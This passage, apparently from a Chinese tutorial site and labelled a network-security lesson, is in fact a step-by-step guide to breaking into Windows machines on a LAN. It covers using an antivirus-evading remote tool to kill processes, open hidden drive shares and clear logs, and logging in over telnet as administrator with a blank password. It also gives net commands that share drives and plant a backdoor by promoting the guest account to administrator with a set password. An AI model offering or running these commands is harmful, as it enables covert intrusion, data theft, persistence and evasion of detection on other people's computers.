主頁 > 教育培訓(xùn) > 電腦培訓(xùn) > 網(wǎng)絡(luò)安全工程師教程:局域網(wǎng)入侵檢測全過程(2)

網(wǎng)絡(luò)安全工程師教程:局域網(wǎng)入侵檢測全過程(2)

  2.Recton-D賀免殺專用版還有其他功能,在\"進程\"項中,可以查看遠程主機的進程,并可任意結(jié)束其中進程;在\"共享\"項中,可以創(chuàng)建共享,我常用的是創(chuàng)建C$,D$,E$,F$,共享路徑分別對應(yīng)C:\\,D:\\等,共享好后在地址欄中輸入\\\\IP\\C$,進入對方C盤,你就可以隨意復(fù)制刪除里面的東西了,而且這種共享對方機子盤符上不會顯示共享圖標(biāo),也就不會被發(fā)現(xiàn),弄完后最好還是把共享給關(guān)掉。最后選\"日志\",清除所有日志,不留痕跡。這個軟件會被殺毒軟件當(dāng)作病毒殺掉,用它時須將實時防毒關(guān)掉。

  3.上面的共享可通過CMD(程序-附件-命令提示符)完成,首先\"telnet IP\",telnet上去,鍵入y后輸入的用戶名\"administrator\",密碼為空, 進入后,開共享用net share命令,共享C$(即C盤):\"net share C$=C:\",共享system文件夾:\"net share c=c:\\winnt\\system32\",共享IPC$用:\"net share IPC$\"等,最后是關(guān)閉共享,關(guān)閉C盤共享:\"net share C$ /del\"。

  4.為方便下次入侵,可以設(shè)置后門, 查看用戶:\"net user\",激活guest用戶

  \"net user guest /active:yes\",更改guest的密碼為poco:\"net user guest poco\",把guest的權(quán)限提升為管理員權(quán)限:\"net localgroup administrators guest /add\"。

  5.telnet命令(dos命令)很多,可去網(wǎng)上查找它的命令,常用的有:查看D盤文件:\"\"dir d:\\\",查看C盤program file文件夾:\"dir c:\\PROGRA~1\\;\",60秒倒記時關(guān)機:\"shutdown -s -t 60\"

  補充說明:

  1.net use錯誤原因解決:

  (1).\"發(fā)生系統(tǒng)錯誤 1326。 登錄失?。?未知的用戶名或錯誤密碼。\"

  在遠程機的\"控制面板-文件夾選項-查看-簡單的文件共享\",去掉選取,然后再嘗試連接。簡單文件共享會把網(wǎng)絡(luò)連接權(quán)限都歸為 guest連接,是無法訪問C$等管理共享的.

  (2)\"發(fā)生系統(tǒng)錯誤 1327。 登陸失?。河脩魩粝拗???赡艿脑虬ú辉试S空密碼,登陸時間限制,或強制的策略限。\"在遠程機的\"控制面板-管理工具-本地安全策略-安全選項-用戶權(quán)限\"指派里,禁用\"空密碼用戶只能進行控制臺登陸\".

  (3)\"//IP/c$\"時提示找不到網(wǎng)絡(luò)途徑。在\"網(wǎng)絡(luò)和撥號連接\"中\(zhòng)"本地連接\"中選取\"Internet協(xié)議(TCP/IP)\"屬性,進入\"高級TCP/IP設(shè)置\"選\"WINS設(shè)置\"里面有一項\"啟用TCP/IP的NETBIOS\".

免責(zé)聲明:該文觀點僅代表作者本人,查查吧平臺系信息發(fā)布平臺,僅提供信息存儲空間服務(wù),不承擔(dān)相關(guān)法律責(zé)任。圖片涉及侵權(quán)行為,請發(fā)送郵件至85868317@qq.com舉報,一經(jīng)查實,本站將立刻刪除。返回查查吧首頁,查看更多>>
提示

該文觀點僅代表作者本人,查查吧平臺系信息發(fā)布平臺,僅提供信息存儲空間服務(wù),不承擔(dān)相關(guān)法律責(zé)任。圖片涉及侵權(quán)行為,請發(fā)送郵件至85868317@qq.com舉報,一經(jīng)查實,本站將立刻刪除。

優(yōu)惠商城

更多